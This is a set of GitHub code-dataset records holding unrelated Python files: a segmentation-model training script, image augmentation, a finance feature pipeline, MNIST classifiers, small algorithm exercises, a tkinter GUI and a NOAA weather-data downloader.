score, up_opt = tf.metrics.mean_iou(y_true, y_pred_, 2)\r\n K.get_session().run(tf.local_variables_initializer())\r\n with tf.control_dependencies([up_opt]):\r\n score = tf.identity(score)\r\n prec.append(score)\r\n return K.mean(K.stack(prec), axis=0)\r\n\r\n\r\ndef trainModel(train_path, image_folder, mask_folder,\r\n val_path, val_image_folder, val_mask_folder, time_seq, batch_size,\r\n mode_save_dir='unet.h5', num_image=225, epoch=60):\r\n\r\n # input image is sized into input_size = (None, 256, 256, 1) from the generator\r\n model = convLSTM_unet()\r\n # print(\"Training the model\")\r\n model_checkpoint = ModelCheckpoint(mode_save_dir, monitor='loss', verbose=1, save_best_only=True)\r\n\r\n model.compile(optimizer=Adam(lr=1e-4),\r\n loss=\"categorical_crossentropy\", metrics=['accuracy', mean_iou])\r\n\r\n model.fit_generator(my_gen(time_seq, train_path, image_folder, mask_folder, batch_size=batch_size),\r\n steps_per_epoch=num_image/(batch_size*time_seq), epochs=epoch,\r\n validation_data=validation_generator(time_seq,\r\n val_path, val_image_folder, val_mask_folder, batch_size=batch_size),\r\n validation_steps=num_image/(batch_size*time_seq), callbacks=[model_checkpoint])\r\n\r\n\r\nif __name__ == '__main__':\r\n train_path = \"/data/d0/ascstd/hwyong/data/train\"\r\n image_folder = \"left_frames\"\r\n mask_folder = \"pro_mask\"\r\n val_path = \"/data/d0/ascstd/hwyong/data/valid\"\r\n val_image_folder = \"val_train\"\r\n val_mask_folder = \"val_mask\"\r\n model_path = '/data/ssd/public/MAX_YONG/EADseg/unet_multiple_convLSTM_6.h5'\r\n\r\n print(\"Main is functioning\")\r\n\r\n trainModel(train_path, image_folder=image_folder, mask_folder=mask_folder,\r\n val_path=val_path, val_image_folder=val_image_folder,\r\n val_mask_folder=val_mask_folder, time_seq=2,\r\n mode_save_dir=model_path, batch_size=2, num_image=225, epoch=200)\r\n","repo_name":"maxyonghuawei/Unet_seg","sub_path":"Model_multiple_convLstm_imgaug.py","file_name":"Model_multiple_convLstm_imgaug.py","file_ext":"py","file_size_in_byte":13050,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"7834473634","text":"import os, numpy as np\nimport constants as cs\n\ntry:\n\timport cv2\nexcept:\n\timport sys\n\tsys.path.append('/usr/local/lib/python2.7/site-packages')\n\timport cv2\n\ndef remove_augmented_data(folders):\n\tfor folder in folders:\n\t\tall_images=os.listdir(folder)\n\t\tfor image_name in all_images:\n\t\t\timg_path=folder+'/'+image_name\n\t\t\tfor suffix in cs.suffixes.values():\n\t\t\t\tif suffix in img_path:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tos.remove(img_path)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\ndef augment_and_save(folders):\n\tfor folder in folders:\n\t\tall_images=os.listdir(folder)\n\t\tfor image_name in all_images:\n\t\t\timg_path=folder+'/'+image_name\n\t\t\timage=cv2.imread(img_path,cv2.IMREAD_COLOR)\n\t\t\tif image is None:\n\t\t\t\tprint('Could not read file: ', img_path)\n\t\t\t\tcontinue\n\t\t\telse:\n\n\t\t\t\ttransform1=cv2.GaussianBlur(image,(3,3),sigmaX=0.2,sigmaY=0.2) #add gaussian blur to image\n\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['gb']),transform1) #image with gaussian blur\n\n\t\t\t\tif np.random.random() <0.5: #we either flip the image or get a perspective transform about some points\n\t\t\t\t\ttransform2=np.fliplr(image)\n\t\t\t\t\ttransform3= cv2.GaussianBlur(transform2,(3,3),sigmaX=0.2,sigmaY=0.2) #add gaussian blur to 
transform2\n\t\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['f']),transform2) #image flipped\n\t\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['fgb']),transform3) #flipped and gaussian blur\n\t\t\t\telse:\n\t\t\t\t\ttransform2 = cv2.warpPerspective(image,cs.perspective_matrix,(cs.im_width,cs.im_height))\n\t\t\t\t\ttransform3= cv2.GaussianBlur(transform2,(3,3),sigmaX=0.2,sigmaY=0.2) #add gaussian blur to transform2\n\t\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['p']),transform2) #image perspective transform\n\t\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['pgb']),transform3) #transform with gaussian blur\n\t\t\t\t\n\t\t\t\t#implements unsharp masking\n\t\t\t\tmask= cv2.filter2D(image,-1,cs.unsharp_kernel)\n\t\t\t\ttransform4= cv2.addWeighted(src1=image,alpha=1.05,src2=mask,beta=-0.05,gamma=0) #output= alpha*src1 + beta+src2 + gamma\n\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['um']),transform4) #unsharp masked image\n\n\t\t\t\tif cs.allow_rotation:\n\t\t\t\t\t#implements rotation\n\t\t\t\t\trows,cols = cs.im_width,cs.im_height\n\t\t\t\t\tangle=cs.min_angle+np.random.random()*(cs.max_angle-cs.min_angle)\n\t\t\t\t\tM = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n\t\t\t\t\ttransform5= cv2.warpAffine(image,M1,(cols,rows))\n\t\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['r']),transform5) #rotated image\n\n\t\t\t\t#break\n\tprint('Done')","repo_name":"dataplayer12/hey-daug","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"33654944418","text":"from .job import Task\n\n\nclass Broker(object):\n task_cls = Task\n\n def __init__(self, env, task_configs):\n self.env = env\n self.simulation = None\n self.machine = None\n self.destroyed = False\n self.task_configs = task_configs\n\n def attach(self, simulation):\n self.simulation = simulation\n self.machine = simulation.machine\n\n def run(self):\n for task_config in self.task_configs:\n #assert task_config.submit_time >= self.env.now\n #yield self.env.timeout(task_config.submit_time - self.env.now)\n task = Broker.task_cls(self.env, task_config)\n # print('a task arrived at time %f' % self.env.now)\n self.machine.add_task(task)\n self.destroyed = True\n","repo_name":"846468230/DQN","sub_path":"simulations/broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"24059197797","text":"import math\n\n\ndef evaluate(a, b, op):\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n else:\n assert False\n\n\ndef calculation(M, m, i, j, operators):\n min_value = math.inf\n max_value = -math.inf\n\n for k in range(i, j):\n a = evaluate(M[i][k], M[k+1][j], operators[k])\n b = evaluate(M[i][k], m[k+1][j], operators[k])\n c = evaluate(m[i][k], M[k+1][j], operators[k])\n d = evaluate(m[i][k], m[k+1][j], operators[k])\n min_value = min(min_value, a, b, c, d)\n max_value = max(max_value, a, b, c, d)\n return min_value, max_value\n\n\ndef maximum_value(operators, values):\n m = [[0 for x in range(len(values))] for x in range(len(values))]\n M = [[0 for x in range(len(values))] for x in range(len(values))]\n\n for i in range(len(values)):\n m[i][i] = values[i]\n M[i][i] = values[i]\n\n for s in range(1, 
len(values)):\n for i in range(0, len(values)-s):\n j = i + s\n m[i][j], M[i][j] = calculation(M, m, i, j, operators)\n\n return M[0][len(values)-1]\n\n\nif __name__ == \"__main__\":\n input = input()\n operators, values = [], []\n\n for i in input:\n if i in ['+', '-', '*']:\n operators.append(i)\n else:\n values.append(int(i))\n\n print(maximum_value(operators, values))\n","repo_name":"hrap01/algorithms_data_structures","sub_path":"01 Algorithmic Toolbox/06_placing paretheses.py","file_name":"06_placing paretheses.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10104992338","text":"import clr\nclr.AddReference(r'dll/Skender.Stock.Indicators')\n\nimport FinanceHistoryDataReader.QouteHistory as qh\nimport FinanceHistoryDataReader.Indicator as Indicator\nimport FinanceHistoryDataReader.processing as processing\n\n##############################\nTICKER = \"CVX\"\n\nMARKET = \"XNYS\"\nMARKET_NAME = \"nyse\"\nMARKET_TICKER = \"IXIC\"\n\nYEAR_FROM = \"2010\"\n\nWTI_ENABLE = True\nNLP_ENABLE = True\n\nNAN_FILLER_DECAY = 0.02\n##############################\nfeature_list = []\n\n# Fetching\nprint(\"Fetching OHLCV and other related price data...\")\nprice_history = qh.get_history(TICKER, YEAR_FROM, market=MARKET, per=True, pbr=True)\nqh.fill_nan(price_history, \"per\")\nqh.fill_nan(price_history, \"pbr\")\n\n\n# Technical Indicators\nqh.add_column_by_day(price_history, \"aroon_5\", Indicator.get_AROON(price_history, 5))\nqh.add_column_by_day(price_history, \"adx_5\", Indicator.get_ADX(price_history, 5))\nqh.add_column_by_day(price_history, \"elder_ray_bull_5\", Indicator.get_elder_ray_bull(price_history, 5))\nqh.add_column_by_day(price_history, \"elder_ray_bear_5\", Indicator.get_elder_ray_bear(price_history, 5))\nqh.add_column_by_day(price_history, \"vortex_pos_5\", Indicator.get_vortex_positive(price_history, 5))\nqh.add_column_by_day(price_history, \"vortex_neg_5\", Indicator.get_vortex_negative(price_history, 5))\nqh.add_column_by_day(price_history, \"donchian_5\", Indicator.get_donchian(price_history, 5))\nqh.add_column_by_day(price_history, \"fcb_upper_5\", Indicator.get_fcb_upper(price_history, 5))\nqh.add_column_by_day(price_history, \"fcb_lower_5\", Indicator.get_fcb_lower(price_history, 5))\n\nqh.add_column_by_day(price_history, \"gator_upper\", Indicator.get_gator_upper(price_history))\nqh.add_column_by_day(price_history, \"gator_lower\", Indicator.get_gator_lower(price_history))\nqh.add_column_by_day(price_history, \"alligator_jaw\", Indicator.get_alligator_jaw(price_history))\nqh.add_column_by_day(price_history, \"alligator_teeth\", Indicator.get_alligator_teeth(price_history))\nqh.add_column_by_day(price_history, \"alligator_lips\", Indicator.get_alligator_lips(price_history))\n\nqh.add_column_by_day(price_history, \"ichimoku_9_26_52\", Indicator.get_ichimoku(price_history, 9, 26, 52))\nqh.add_column_by_day(price_history, \"macd_12_26_9\", Indicator.get_macd(price_history, 12, 26, 9))\nqh.add_column_by_day(price_history, \"super_trend_14_3\", Indicator.get_super_trend(price_history, 14,3))\nqh.add_column_by_day(price_history, \"bollinger_bands_upper_20_2\", Indicator.get_bollinger_bands_upper(price_history, 20,2))\nqh.add_column_by_day(price_history, \"bollinger_bands_lower_20_2\", Indicator.get_bollinger_bands_lower(price_history, 20,2))\nqh.add_column_by_day(price_history, \"std_dev_channels_20_2\", Indicator.get_std_dev_channels(price_history, 20,2))\n\n# Market Moving 
Avg\nprint(f\"Calculating Market({MARKET_NAME}) Moving Avg...\")\nmarket_history = qh.get_history(MARKET_TICKER, YEAR_FROM)\nmarket_sma5 = Indicator.get_SMA(market_history, 5)\nmarket_sma20 = Indicator.get_SMA(market_history, 20)\nmarket_sma60 = Indicator.get_SMA(market_history, 60)\nmarket_sma120 = Indicator.get_SMA(market_history, 120)\n\nqh.add_column_by_day(price_history, \"market_sma5\", market_sma5)\nqh.add_column_by_day(price_history, \"market_sma20\", market_sma20)\nqh.add_column_by_day(price_history, \"market_sma60\", market_sma60)\nqh.add_column_by_day(price_history, \"market_sma120\", market_sma120)\n\n# U.S bond Moving Avg\nprint(\"Calculating U.S bond Moving Avg...\")\nbond_u3y_history = qh.get_history('US3YT=X', YEAR_FROM)\nbond_u3y_sma5 = Indicator.get_SMA(bond_u3y_history, 5)\nbond_u3y_sma20 = Indicator.get_SMA(bond_u3y_history, 20)\nbond_u3y_sma60 = Indicator.get_SMA(bond_u3y_history, 60)\nbond_u3y_sma120 = Indicator.get_SMA(bond_u3y_history, 120)\n\nqh.add_column_by_day(price_history, \"bond_u3y_sma5\", bond_u3y_sma5)\nqh.add_column_by_day(price_history, \"bond_u3y_sma20\", bond_u3y_sma20)\nqh.add_column_by_day(price_history, \"bond_u3y_sma60\", bond_u3y_sma60)\nqh.add_column_by_day(price_history, \"bond_u3y_sma120\", bond_u3y_sma120)\n\n# WTI Moving Avg\nif WTI_ENABLE:\n print(\"Calculating WTI Moving Avg...\")\n wti_history = qh.get_history(\"CL\", YEAR_FROM)\n wti_sma5 = Indicator.get_SMA(wti_history, 5)\n wti_sma20 = Indicator.get_SMA(wti_history, 20)\n wti_sma60 = Indicator.get_SMA(wti_history, 60)\n wti_sma120 = Indicator.get_SMA(wti_history, 120)\n \n qh.add_column_by_day(price_history, \"wti_sma5\", wti_sma5)\n qh.add_column_by_day(price_history, \"wti_sma20\", wti_sma20)\n qh.add_column_by_day(price_history, \"wti_sma60\", wti_sma60)\n qh.add_column_by_day(price_history, \"wti_sma120\", wti_sma120)\n\n# Post-processing\nprint(\"Post-processing data...\")\nfeature_list += [\n \"market_sma5\", \"market_sma20\", \"market_sma60\", \"market_sma120\", \n \"bond_u3y_sma5\", \"bond_u3y_sma20\", \"bond_u3y_sma60\", \"bond_u3y_sma120\", \n \"aroon_5\",\n \"adx_5\",\n \"elder_ray_bull_5\",\n \"elder_ray_bear_5\",\n \"vortex_pos_5\",\n \"vortex_neg_5\",\n \"donchian_5\",\n \"fcb_upper_5\",\n \"fcb_lower_5\",\n \"gator_upper\",\n \"gator_lower\",\n \"alligator_jaw\",\n \"alligator_teeth\",\n \"alligator_lips\",\n \"ichimoku_9_26_52\",\n \"macd_12_26_9\",\n \"super_trend_14_3\",\n \"bollinger_bands_upper_20_2\",\n \"bollinger_bands_lower_20_2\",\n \"std_dev_channels_20_2\",\n]\nif WTI_ENABLE:\n feature_list += [ \"wti_sma5\", \"wti_sma20\", \"wti_sma60\", \"wti_sma120\" ]\n\nfor feature in feature_list:\n processing.standardize(price_history, feature)\n\n\n# NLP(https://github.com/kwangwoon-sanhak/SentimentalAnalysis)\nif NLP_ENABLE:\n print(\"Starting NLP...\")\n from calculate_sentiment_score.calculate_sent_score import VocabDictionary\n vocab_dic = VocabDictionary(\"VADER\", TICKER)\n score = vocab_dic.sentiment_analysis()\n\n qh.add_column_by_day(price_history, \"nlp_pos\", score['pos'])\n qh.add_column_by_day(price_history, \"nlp_neg\", score['neg'])\n qh.add_column_by_day(price_history, \"nlp_neu\", score['neu'])\n qh.add_column_by_day(price_history, \"nlp_compound\", score['compound'])\n print(\"NLP finished.\")\n\n print(\"Filling NAN...\")\n qh.fill_nan(price_history, \"nlp_pos\", decay_rate=NAN_FILLER_DECAY)\n qh.fill_nan(price_history, \"nlp_neg\", decay_rate=NAN_FILLER_DECAY)\n qh.fill_nan(price_history, \"nlp_neu\", decay_rate=NAN_FILLER_DECAY)\n 
qh.fill_nan(price_history, \"nlp_compound\", decay_rate=NAN_FILLER_DECAY)\n\n\n# Save\nprice_history = price_history.dropna()\n\nfile_name = f\"{TICKER}_{YEAR_FROM}_with_{MARKET_NAME}_TA\"\nif WTI_ENABLE:\n file_name += \"_wti\"\n\nif NLP_ENABLE:\n file_name += \"_nlp\"\n\nqh.save_as_csv(price_history, f\"{file_name}.csv\")\n\nprint(price_history)\n","repo_name":"kwangwoon-sanhak/FinanceHistoryDataReader","sub_path":"advanced_example.py","file_name":"advanced_example.py","file_ext":"py","file_size_in_byte":6550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13658345224","text":"import os\nimport time\nimport numpy as np\nimport gzip\nimport pickle\nfrom sklearn.preprocessing import LabelBinarizer\n\nfrom utils import *\nfrom knn import KNN\nfrom linear_model import softmaxClassifier\nfrom neural_net import NeuralNet\nfrom svm import supportVectorMachine\nimport cnn\n\n\nwith gzip.open(os.path.join('..', 'data', 'mnist.pkl.gz'), 'rb') as f:\n train_set, valid_set, test_set = pickle.load(f, encoding=\"latin1\")\n\nX_train, y_train = train_set\nX_valid, y_valid = valid_set\nX_test, y_test = test_set\n\n\ndef run_KNN_model():\n # final model k=4\n final_model = KNN(4)\n final_model.fit(X_train, y_train)\n y_pred = final_model.predict(X_valid)\n tr_error = np.mean(y_pred != y_valid)\n print(f\"KNN k={4} Validation error: %.5f\" % tr_error)\n y_pred = final_model.predict(X_test)\n test_error = np.mean(y_pred != y_test)\n print(f\"KNN k={4} Test error: %.5f\" % test_error)\n\n\ndef run_linear_model():\n # final model: softmaxClassifier with optTol=1\n model = softmaxClassifier(optTol=1)\n model.fit(X_train, y_train)\n y_pred = model.predict(X_valid)\n tr_error = np.mean(y_pred != y_valid)\n print(f\"softmaxClassifier Validation error: %.5f\" % tr_error)\n y_pred = model.predict(X_test)\n test_error = np.mean(y_pred != y_test)\n print(f\"softmaxClassifier Test error: %.5f\" % test_error)\n\n\ndef run_MLP_model():\n binarizer = LabelBinarizer()\n Y = binarizer.fit_transform(y_train)\n\n # final model: 2 hidden layers each 1024 hidden units\n num_layers = 2\n hidden_layer_sizes = [1024 for _ in range(num_layers)]\n model = NeuralNet(hidden_layer_sizes, learning_rate=1e-3, max_iter=1000)\n\n t = time.time()\n model.fit(X_train, Y)\n print(\"Fitting took %d seconds\" % (time.time() - t))\n\n # save model weights\n with open('../data/2_layer_weights.pickle', 'wb') as f:\n pickle.dump(model.weights, f)\n\n # Compute validation and test errors\n yhat = model.predict(X_valid)\n validError = np.mean(yhat != y_valid)\n print(f\"{num_layers} hidden layers Validation error = \", validError)\n yhat = model.predict(X_test)\n testError = np.mean(yhat != y_test)\n print(f\"{num_layers} hidden layers Test error = \", testError)\n\n\ndef run_SVM_model():\n # final SVM model with hinge loss: C=400, lr=1e-4\n rate = 1e-4\n svm = supportVectorMachine(C=400, learning_rate=rate, maxEvals=1000)\n svm.fit(X_train, y_train)\n\n # Compute validation and test errors\n y_pred = svm.predict(X_valid)\n tr_error = np.mean(y_pred != y_valid)\n print(f\"SVM lr={rate} Validation error: %.5f\" % tr_error)\n y_pred = svm.predict(X_test)\n ts_error = np.mean(y_pred != y_test)\n print(f\"SVM lr={rate} Test error: %.5f\" % ts_error)\n\n\ndef run_CNN_model():\n # read trained model weights for lr=0.01\n with open(os.path.join('..', 'data', 'cnn_lr_1e-2.pkl'), 'rb') as f:\n params = pickle.load(f)\n\n # Compute validation and test errors\n y_pred = cnn.predict(X_valid, 
params)\n tr_error = np.mean(y_pred != y_valid)\n print(f\"CNN lr={0.01} Validation error: %.5f\" % tr_error)\n y_pred = cnn.predict(X_test, params)\n ts_error = np.mean(y_pred != y_test)\n print(f\"CNN lr={0.01} Test error: %.5f\" % ts_error)\n\n\ndef main():\n run_KNN_model()\n run_linear_model()\n run_SVM_model()\n run_MLP_model()\n run_CNN_model()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"byeung18/machine-learning","sub_path":"final/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10514609401","text":"\"\"\"\r\n1. Two Sum\r\nhttps://leetcode.com/problems/two-sum/\r\n\"\"\"\r\n\r\nclass Solution:\r\n def twoSum(self, nums, target):\r\n for x in range(0, len(nums)):\r\n for y in range(0, len(nums)):\r\n if y != x and nums[x] + nums[y] == target:\r\n return [x, y]\r\n","repo_name":"pmbechard/CodingChallenges","sub_path":"LeetCode/Python/easy/two_sum_1.py","file_name":"two_sum_1.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"14207901395","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import filedialog\n\n\nglobal root\nglobal scrnwparam\nglobal scrnhparam\nscrnwparam = 185\nscrnhparam = 150\n\ndef main():\n global root\n\n root = Tk()\n root.resizable(False, False)\n \n scrnw = (root.winfo_screenwidth()//2) - scrnwparam\n scrnh = (root.winfo_screenheight()//2) - scrnhparam\n root.geometry('240x130+{}+{}'.format(scrnw, scrnh))\n \n app = GUI(root)\n root.mainloop()\n\nclass GUI(Frame):\n def __init__(self, parent):\n Frame.__init__(self, parent, background=\"white\") \n self.parent = parent\n self.parent.title(\"\")\n self.pack(fill=BOTH, expand=1)\n self.initUI()\n \n def initUI(self):\n global SLbl\n Lbl = Label(text=\"Папка проекта:\", background=\"white\")\n Lbl.place(x=16, y=10)\n \n global InputDirEntry\n InputDirEntry = Entry(fg=\"black\", bg=\"white\", width=20)\n InputDirEntry.place(x=20, y=32)\n \n global InputDirBtn\n InputDirBtn = Button(text='Выбор', command=SelectDir)\n #InputDirBtn.place(x=20, y=54, height=20)\n InputDirBtn.place(x=150, y=31, height=20)\n\ndef BtnCmd():\n print('btn pressed')\n Test(Tkinter.Tk(\"test\"))\n\n\ndef SelectDir():\n global InputDir\n\n InputDir = \"\"\n InputDir = filedialog.askdirectory(title='Выберите папку на обработку')\n if InputDir:\n InputDirEntry.configure(state = NORMAL)\n InputDirEntry.delete(0,END)\n InputDirEntry.insert(0,str(InputDir))\n InputDirEntry.configure(state = DISABLED)\n print('IDC: InputDir : {0}'.format(InputDir))\n else:\n print('IDC: InputFile not selected')\n\n\n\n\n\n\n\n\ndef UserSelector():\n top = Toplevel()\n scrnw = (root.winfo_screenwidth()//2) - scrnwparam\n scrnh = (root.winfo_screenheight()//2) - scrnhparam\n top.geometry('180x100+{}+{}'.format(scrnw, scrnh))\n\n top.title(\"toplevel\")\n \n Btn1 = Button(top, text='Выбор', command=UserSelector)\n #InputDirBtn.place(x=20, y=54, height=20)\n Btn1.place(x=10, y=10, height=20)\n\n\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"albertkovach/Python","sub_path":"templates/toplevel/toplevel.py","file_name":"toplevel.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12057571954","text":"import argparse\nimport datetime as dt\nimport 
logging\nimport math\nimport os.path\nimport time\nimport sys\nimport tempfile\n\nimport requests\n\n\nclass DataProduct:\n \"\"\"A representation of NOAA weather data product, able to make requests for data.\"\"\"\n def __init__(self, description, base_url, dir_fn, file_fn,\n out_prefix, interval, levels, variables):\n self.description = description\n self.base_url = base_url\n self.dir_fn = dir_fn\n self.file_fn = file_fn\n self.out_prefix = out_prefix\n self.interval = interval\n self.levels = levels\n self.variables = variables\n\n def _make_params(self, forecast_time, forecast_hour, args):\n \"\"\"Constructs a URL paramater dictionary for the requested forecast time and an hour in\n that forecast.\"\"\"\n basics = {\n 'file': self.file_fn(forecast_time, forecast_hour),\n 'dir': self.dir_fn(forecast_time),\n 'subregion': '',\n 'leftlon': args.min_lon,\n 'rightlon': args.max_lon,\n 'toplat': args.max_lat,\n 'bottomlat': args.min_lat,\n }\n levels = {'lev_{}'.format(l): 'on' for l in self.levels}\n variables = {'var_{}'.format(v): 'on' for v in self.variables}\n return {**basics, **levels, **variables}\n\n def request_forecast(self, forecast_time, forecast_hour, args):\n \"\"\"Requests the URL for the requested time and forecast, printing an info message\n beforehand.\"\"\"\n logging.info('Requesting %s data for %s, forecast hour %d', self.out_prefix,\n forecast_time.strftime('%Y%m%d %HZ'), forecast_hour)\n return requests.get(self.base_url,\n params=self._make_params(forecast_time, forecast_hour, args))\n\n def get_most_recent_cycle_time(self):\n \"\"\"Returns the most recent UTC datetime who's hour is a multiple of the interval.\"\"\"\n cycle_time = dt.datetime.utcnow()\n hour = self.interval * math.floor(cycle_time.hour / self.interval)\n return cycle_time.replace(hour=hour, minute=0, second=0, microsecond=0)\n\n def get_previous_cycle_time(self, cycle_time):\n \"\"\"Returns a UTC datetime one interval before the supplied datatime.\"\"\"\n return cycle_time - dt.timedelta(hours=self.interval)\n\n def filename(self, forecast_time):\n \"\"\"Returns a convenient string for the supplied forecast datetime.\"\"\"\n return forecast_time.strftime(self.out_prefix + '_%Y%m%d_%Hz.grb2')\n\n\nPRODUCTS = {\n 'GFS': DataProduct(\n description='NCEP Global Forecast System at 0.25° resolution',\n base_url=r'https://nomads.ncep.noaa.gov/cgi-bin/filter_gfs_0p25.pl',\n dir_fn=lambda time: r'/gfs.{}/{:02d}/atmos'.format(time.strftime('%Y%m%d'), time.hour),\n file_fn=lambda time, hour: r'gfs.t{:02d}z.pgrb2.0p25.f{:03d}'.format(time.hour, hour),\n out_prefix=r'gfs_0p25',\n interval=6,\n levels=[\n 'surface',\n 'mean_sea_level',\n '2_m_above_ground', # Used for air temperature\n '10_m_above_ground', # Used for surface wind\n 'entire_atmosphere', # Used for cloud cover\n '500_mb',\n ],\n variables=[\n 'UGRD', # U component of wind\n 'VGRD', # V component of wind\n 'GUST', # Wind gust\n 'PRMSL', # Pressure (for surface) [Not available in HRRR]\n 'HGT', # Geopotential height (for 500mb)\n 'TMP', # Temperature\n 'PRATE', # Precipitation rate\n 'VIS', # Visibility\n 'TCDC', # Total cloud cover\n ]),\n 'GFSwavewcoast': DataProduct(\n description='NCEP GFS based waves for West Coast',\n base_url=r'https://nomads.ncep.noaa.gov/cgi-bin/filter_gfswave.pl',\n dir_fn=lambda time: r'/gfs.{}/{:02d}/wave/gridded'.format(\n time.strftime('%Y%m%d'), time.hour),\n file_fn=lambda time, hour: r'gfswave.t{:02d}z.wcoast.0p16.f{:03d}.grib2'.format(\n time.hour, hour),\n out_prefix=r'wave_wcoast_0p16',\n interval=6,\n 
levels=['surface'],\n variables=[\n 'HTSGW', # Significant wave height\n 'WVDIR', # Wind wave direction\n 'WVPER', # Wind wave period\n ]),\n # Unfortunately HRRR isn't usable yet. zxgrib entirely fails to display any grib from HRRR\n # while OpenCPN displays moderately beleivable data but on the wrong place on the map.\n 'HRRR': DataProduct(\n description='NCEP High Resolution Rapid Refresh for continental US',\n base_url=r'https://nomads.ncep.noaa.gov/cgi-bin/filter_hrrr_2d.pl',\n dir_fn=lambda time: r'/hrrr.{}/conus'.format(time.strftime('%Y%m%d')),\n file_fn=lambda time, hour: r'hrrr.t{:02d}z.wrfsfcf{:02d}.grib2'.format(time.hour, hour),\n out_prefix=r'hrrr_conus',\n interval=1,\n levels=[\n 'surface',\n 'mean_sea_level',\n '2_m_above_ground', # Used for air temperature\n '10_m_above_ground', # Used for surface wind\n 'entire_atmosphere', # Used for cloud cover\n '500_mb',\n ],\n variables=[\n 'UGRD', # U component of wind\n 'VGRD', # V component of wind\n 'GUST', # Wind gust\n #'PRMSL', # Pressure (for surface) [Not available in HRRR]\n 'HGT', # Geopotential height (for 500mb)\n 'TMP', # Temperature\n 'PRATE', # Precipitation rate\n 'VIS', # Visibility\n 'TCDC', # Total cloud cover\n ]),\n}\n\n\ndef create_parser():\n \"\"\"Creates the definition of the expected command line flags.\"\"\"\n\n class SmartFormatter(argparse.HelpFormatter):\n \"\"\"Trivial formatter to wrap strings beginning with `R|` using their embedded line feeds.\"\"\"\n def _split_lines(self, text, width):\n if text.startswith('R|'):\n return text[2:].splitlines()\n # this is the RawTextHelpFormatter._split_lines\n return argparse.HelpFormatter._split_lines(self, text, width)\n\n parser = argparse.ArgumentParser(\n description='Script to collect NOAA GRIB data for only interesting variables and a limited '\n 'geographical range',\n epilog='Copyright Jody Sankey 2022',\n formatter_class=SmartFormatter)\n parser.add_argument('-o', '--output_dir', action='store', metavar='DIR',\n default=tempfile.gettempdir(), help=\"Directory for output file.\")\n parser.add_argument('-p', '--product', action='append', choices=PRODUCTS.keys(),\n help=\"R|NWS products to fetch:\\n\" +\n \"\\n\".join([' {} - {}'.format(k, PRODUCTS[k].description)\n for k in PRODUCTS]) +\n \"\\nMay be supplied multiple times for multiple products.\")\n parser.add_argument('-d', '--duration', action='store', default=48, type=int, metavar='HOURS',\n help=\"Time range to collect (this range starts at model run time, not \"\n \"current time).\")\n parser.add_argument('-i', '--interval', action='store', default=1, type=int, metavar='HOURS',\n help=\"Number of hours between collected datasets.\")\n parser.add_argument('-s', '--sleep', action='store', default=500, type=int, metavar='MS',\n help=\"Number of milliseconds to sleep between requests to avoid DoS.\")\n parser.add_argument('--min_lat', action='store', default=34, type=int, metavar='DEGREES',\n help=\"Minimum latitude to collect data for, positive for North.\")\n parser.add_argument('--max_lat', action='store', default=41, type=int, metavar='DEGREES',\n help=\"Maximum latitude to collect data for, positive for North.\")\n parser.add_argument('--min_lon', action='store', default=-127, type=int, metavar='DEGREES',\n help=\"Minimum longitude to collect data for, positive for East.\")\n parser.add_argument('--max_lon', action='store', default=-120, type=int, metavar='DEGREES',\n help=\"Maximum longitude to collect data for, positive for East.\")\n parser.add_argument('-q', '--quiet', action='store_true',\n 
help=\"Don't print output for successful operations.\")\n parser.add_argument('--after', action='store', metavar='FILE',\n help=\"Output filename which new data must be later than.\")\n return parser\n\n\ndef main():\n \"\"\"Executes the script using command line arguments.\"\"\"\n args = create_parser().parse_args()\n log_level = logging.WARN if args.quiet else logging.INFO\n logging.basicConfig(format='%(message)s', level=log_level)\n\n\n product_names = args.product if args.product else ['GFS']\n for product in [PRODUCTS[name] for name in product_names]:\n forecast_time = product.get_most_recent_cycle_time()\n resp = product.request_forecast(forecast_time, 0, args)\n\n # If the server doesn't have this most recent time yet, backoff to the previous time\n if resp.status_code == 404:\n logging.info('Not found, backing off one interval')\n forecast_time = product.get_previous_cycle_time(forecast_time)\n resp = product.request_forecast(forecast_time, 0, args)\n\n # If neither succeeded just quit.\n if resp.status_code != 200:\n sys.exit('HTTP response code {}'.format(resp.status_code))\n\n # If an after argument was supplied (usually from the previous run) check the time we've\n # found is actually later. If not then just quit.\n filename = product.filename(forecast_time)\n if args.after and filename <= args.after:\n logging.info('Data at %s was not after %s. Quitting.', filename, args.after)\n return\n\n # Write this first response and a set of additional forecast hours to file.\n filepath = os.path.join(args.output_dir, filename)\n with open(filepath, 'wb') as file:\n file.write(resp.content)\n for forecast_hour 